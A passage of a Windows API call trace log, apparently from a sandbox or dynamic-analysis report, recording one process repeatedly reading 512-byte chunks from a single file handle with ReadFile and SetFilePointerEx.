nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.730] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.730] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.730] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 
lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.731] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.731] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.731] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 
[0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.732] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.732] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.732] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, 
lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.733] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.733] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.733] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] 
_get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.734] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.734] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.734] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 
[0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.735] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.735] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.735] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.736] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.736] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.736] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, 
lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.737] _get_osfhandle (_FileHandle=4) returned 0x54 
[0098.737] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.737] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x30dd44 | out: lpNewFilePointer=0x0) returned 1 [0098.738] _get_osfhandle (_FileHandle=4) returned 0x54 [0098.738] ReadFile (in: hFile=0x54, lpBuffer=0x30eb74, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x30dd64, lpOverlapped=0x0 | out: lpBuffer=0x30eb74*, lpNumberOfBytesRead=0x30dd64*=0x200, lpOverlapped=0x0) returned 1 [0098.738] SetFilePointerEx (in: hFile=0x54, 
